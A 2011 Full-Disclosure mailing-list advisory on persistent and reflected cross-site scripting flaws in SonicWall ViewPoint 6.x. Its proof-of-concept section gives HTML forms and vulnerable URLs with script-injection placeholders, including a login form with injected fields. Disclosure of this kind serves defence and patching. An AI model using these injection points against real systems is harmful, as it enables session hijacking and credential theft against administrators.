[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Sonicwall Viewpoint v6.x - Multiple Web
From: "research () vulnerability-lab ! com" <research () vulnerability-lab ! com>
Date: 2011-09-26 3:19:37
Message-ID: 4E7FEF49.7080905 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities
Date:
=====
2011-09-26
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=195
VL-ID:
=====
195
Introduction:
=============
SonicWALL ® ViewPoint™ ist ein benutzerfreundliches webbasiertes Reporting-Tool, das die \
Sicherheitsprodukte und -dienste von SonicWALL vollständig unterstützt und erweitert. Es \
kann flexibel als Software oder virtuelle Appliance implementiert werden. Umfassende \
Reporting-Funktionen geben Administratoren einen unmittelbaren Einblick in den Zustand, die \
Leistung und die Sicherheit ihres Netzwerks. Mithilfe der anpassbaren Ăśbersichtsanzeige und \
einer Vielzahl von Verlaufsberichten unterstĂĽtzt SonicWALL ViewPoint Unternehmen aller \
Größen dabei, Netzwerknutzung und Sicherheitsaktivitäten zu überwachen und die Webnutzung \
anzuzeigen.
(Copy of the Vendor Homepage: \
http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html)
Abstract:
=========
Vulnerability-Lab Team discovered multiple Input Validation Vulnerabilities on SonicWalls \
Viewpoint appliance/application.
Report-Timeline:
================
2011-05-16: Vendor Notification
2011-06-21: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2011-09-26: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
Sonicwall Viewpoint v6.x & older versions
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected on sonicwalls viewpoint & \
global management application. The persistent vulnerability allows an local low privileged user \
account to manipulate specific application modules or content requests.
Vulnerable Module(s): (Persistent)
[+] SonicWall Training (Titel; RSS_URL;Logs Mail)
[+] Current Sessions (Titel)
[+] Add Componente
[+] Report Layout / Template
[+] Scheduled Reports
[+] Security Dashboard
[+] Custom Report – Website Filtering
[+] SonicWall Today
[+] SonicToday Pagetitle
[+] SonicToday log title
1.2
Multiple non-persistent input validation vulnerabilities are detected on sonicwalls viewpoint & \
global management application. The non persistent vulnerability allows an remote attacker to \
hijack customer/admin session with high required user inter action.
Vulnerable Module(s): (Non Persistent)
[+] FTP Usage / Top Users of FTP / Web Usage Top Sites
[+] Show Logs
[+] Description
[+] Security Dashboard
Picture(s):
../ive1.png
../ive2.png
../ive3.png
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts.
For demonstration or reproduce ...
Section: Top FTP Users
<input type=hidden name="reportType" value="singleday_report" />
<input type=hidden name="wrapped" value=">"<INSERT YOUR SCRIPTCODE HERE!>" />
<input type=hidden name="updatePerm" value="1" />
<input type=hidden name="node_id" value="UT1258498415223005056BA2A2D" />
<input type=hidden name="t" value="Reports_FTPUsage_ByUser_Snwls" />
<input type=hidden name="level" value="3" />
<input type=hidden name="r" value="60" />
<input type=hidden name="page" value="reports/topTenReport.jsp" />
<input type=hidden name="p" value="7640" />
<input type=hidden name="action" value="showPage" />
<input type=hidden name="report_id" value="180" />
<input type=hidden name="help_url" value="http://help.xxx.com/help.asp?l=<INSERT YOUR \
SCRIPTCODE HERE!>" /> <input type=hidden name="unused" value="1" />
<input type=hidden name="isTimeBasedReport" value="0" />
<input type="hidden" name="bidirection" value="0">
Section: License Viewpoint
<form method="post" action="login.jsp">
<input type="hidden" name="login" value="1"/>
<input type="hidden" name="url" value="/stats/pdf?sn=<INSERT YOUR SCRIPTCODE HERE!>
<input type="hidden" name="sn" value=">"<INSERT YOUR SCRIPTCODE HERE!>"/>
Username: <input type="text" name="userName"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
createDataBox(unescape(''),'','logs','2','284','5','5','Logs"><h1><INSERT SCRIPTCODE \
HERE!><"','DBC1269337065018005056BA2A2D','0','3','1','null'); <-- ;)
References: [x] <=
http://viewpoint.xxx.com/sgms/granular_report?action=view_report_action&template_id=100&config_id=7&config_name=facebook&node_id=UT1258498415223005056BA2A2D&successURL=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/topTenReport.jsp&repor \
t_id=180&level=3&node_id=UT1258498415223005056BA2A2D&unused=1&updatePerm=1&help_url=http://help.xxx.com/help.asp?l=eng&t=Reports_FTPUsage_ByUser_Snwls&p=7640&r=60&wrapped=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/loginReport.jsp&level= \
3&node_id=UT1258498415223005056BA2A2D&firewall_reports_id=4327&report_id=310&sortCol=%20Time%20&sortOrder=1&total_records=1287&chartType=null&displayType=[x]&record_offset=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/logviewer/showlog2.jsp \
?serial_number=0017C51036B8&level=3&node_id=null&firewall_reports_id=0&report_id=null&sortCol=Dst%20Interface&sortOrder=0&total_records=397804&chartType=
http://lmdashboard.xxx.com/stats/pdf?sn=
Risk:
=====
The security risk of the persistent vulnerabilities are estimated as medium(+).
The security risk of the non-persistent vulnerabilities are estimated as low.
Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. Any modified copy or reproduction, including partially usages, of \
this file requires authorization from Vulnerability- Lab. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2011|Vulnerability-Lab
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic